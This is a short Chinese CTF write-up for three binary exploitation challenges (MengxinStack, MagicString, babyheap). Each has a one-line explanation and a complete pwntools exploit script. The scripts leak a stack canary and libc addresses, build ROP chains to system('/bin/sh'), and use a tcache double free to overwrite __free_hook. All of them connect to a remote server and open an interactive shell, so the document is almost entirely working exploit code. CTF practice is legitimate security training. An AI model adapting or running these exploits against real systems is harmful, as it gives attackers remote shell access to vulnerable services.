exec_comm.constprop+1162kaishell
PWN_MengxinStack
栈不会了orz
就是基本的栈溢出操控libc_start_main这个函数来控制程序流程需要将返回地址爆破到libc_start_main+176然后就是基本的ROP了
exp:
#!/usr/bin/python2
from pwn import *
p=0
def pwn(ip,port,debug):
global p
if debug==1:
p=process('./mengxinpwn')
#p=remote('124.156.121.112',28012)
elf=ELF('./mengxinpwn')
libc=elf.libc
else:
p=remote(ip,port)
elf=ELF('./mengxinpwn')
libc=elf.libc
payload='a'*0x29
p.sendafter('?',payload)
p.recvuntil('a'*0x29)
cannary=u64('\x00'+p.recv(7))
stack_addr=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')- 304
log.success('cannary: '+hex(cannary))
log.success('stack: '+hex(stack_addr))
p.send('a'*0x28+p64(cannary)+'a'*0x10+p64(stack_addr)+'\xf0\xd7')
p.sendafter('?','a'*0x48)
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__libc_start_main']-240
system=libcbase+libc.sym['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
pop_rdi=libcbase+0x0000000000021102
p.send('a'*0x28+p64(cannary)+'a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(system))
p.interactive()
return True
if __name__=="__main__":
while 1:
try:
if pwn('124.156.121.112',28088,0)==True:
break
except Exception as e:
p.close()
continue
PWN_MagicString
这里有个改变字符串的函数将ti编程sh即可
exp:
#!/usr/bin/python2
from pwn import *
def pwn():
#p=process('./mackstring')
p=remote('124.156.121.112',28012)
elf=ELF('./mackstring')
payload='a'*0x2a8+p64(0x400733)+p64(0x601048+5)+p64(0x40062D)
payload+=p64(0x400732+1)+p64(0x601048)+p64(elf.plt['system'])
p.sendlineafter('!',payload)
p.interactive()
if __name__=="__main__":
pwn()
PWN_babyheap
tcache的double free不难好像可以布置好堆块将tcache写坏然后就行了
#!/usr/bin/python2
from pwn import *
def pwn():
#p=process('./babyheap')
p=remote('124.156.121.112',28025)
elf=ELF('./babyheap')
libc=elf.libc
def add(data):
p.sendlineafter('>>','1')
p.sendlineafter(':',data)
def delete(idx):
p.sendlineafter('>>','2')
p.sendlineafter(':',str(idx))
def show(idx):
p.sendlineafter('>>','3')
p.sendlineafter(':',str(idx))
add('\x01')
add('\x02'*0x10)
add('/bin/sh\x00')
add('doudou3')
add('doudou4')
delete(0)
delete(0)
show(0)
heap_base=u32(p.recv(4))-0x260
log.success('heap_base: '+hex(heap_base))
add(p64(heap_base+0x50))
add(p64(heap_base+0x50))
add(p64(0x30)+p64(0x00602060))
add(p64(elf.got['free']))
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
add(p64(free_hook))
add(p64(0)+p64(free_hook))
add(p64(system))
delete(2)
p.interactive()
if __name__=="__main__":
pwn()